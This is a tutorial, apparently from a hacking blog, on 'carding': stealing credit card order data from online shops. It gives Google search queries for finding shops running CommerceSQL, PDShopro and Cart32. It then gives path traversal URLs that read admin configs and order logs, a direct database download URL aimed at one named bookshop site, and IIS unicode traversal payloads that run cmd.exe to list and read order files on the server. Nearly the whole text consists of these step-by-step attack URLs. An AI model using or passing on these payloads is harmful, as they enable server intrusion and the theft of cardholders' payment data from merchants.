Carding Tutorial

E-Commerce

1. Find target Website commerceSQL at google.com, with keyword :

allinurl:/commercesql/

2. For example we get target with url :

http://www.example.com/commercesql/blablabla

3. Replace the URL to be :

-> www.example.com/cgi-bin/commercesql/index.cgi?page=

4. Example to see admin config

-> www.example.com/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl

5. Example to see admin manager

http://www.example.com/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi

6. To see file log/ccnya ->

http://www.example.com/cgi-bin/commercesql/index.cgi?page=../admin/files/order.log

7. Done


PDShopro

1. Find target Website PDshopro at google.com, with keyword allinurl:/shop/category.asp/
catid=

2. First we have to watch the database configuration by replacing the URL to be: www.example.com/admin/dbsetup.asp

3. Target example : http://www.marktwainbooks.com/admin/dbsetup.asp

4. We will get the name of databese : sdatapdshoppro.mdb

5. Now to download sdatapdshoppro.mdb file, you can replace the URL to be : http:// www.marktwainbooks.com/data/pdshoppro.mdb

6. Open file .mdb- using Microsoft Access

7. Good luck !

Cart32

1. Find target at www.google.com with keyword allinurl:/cart32.exe/

2. For example we have target with url:
http://www.example.com/scripts/cart32.exe/blablabla

3. Replace that url to be -> http://www.example.com/scripts/

4. Modify that url with unicode at the end -> http://www.example.com/scripts/

5. example unicode for path /scripts/ : -->

/scripts/%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:\

For path path /cgi-bin/ ->
/cgi-bin/..\..\..\..\..\..\winnt\system32\cmd.exe?/c+dir+c:\
/cgi-bin/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:\

6. for example, at that url using path /scripts/ than relace to be http://www.example.com/scripts/%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\

7. End string unicode with dir+c:\ It means we are on the directory c server target!

8. For enter to the directory replace cc's unicode with -> http://www.example.com/scripts/%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\progra~1\mwainc\cart32\

9. We will get ouput and listing form.32 file'w, for example :WRBURNS-001065.c32

10. For viewing the file with unicode http://www.example.com/scripts/%c1%9c/winnt/system32/cmd.exe?/c+type+c:\progra~1\mwainc\cart32\WRBURNS-001065.c32

11. If it doesn't work, you have to try with another unicode.

nb: coba deh salah satu dari ketiga cara diatas... bila da yang berhasil, jangan disalah gunakan ya? atau aq bakal hapus semua ilmu hacking yang aq punya di blog ini....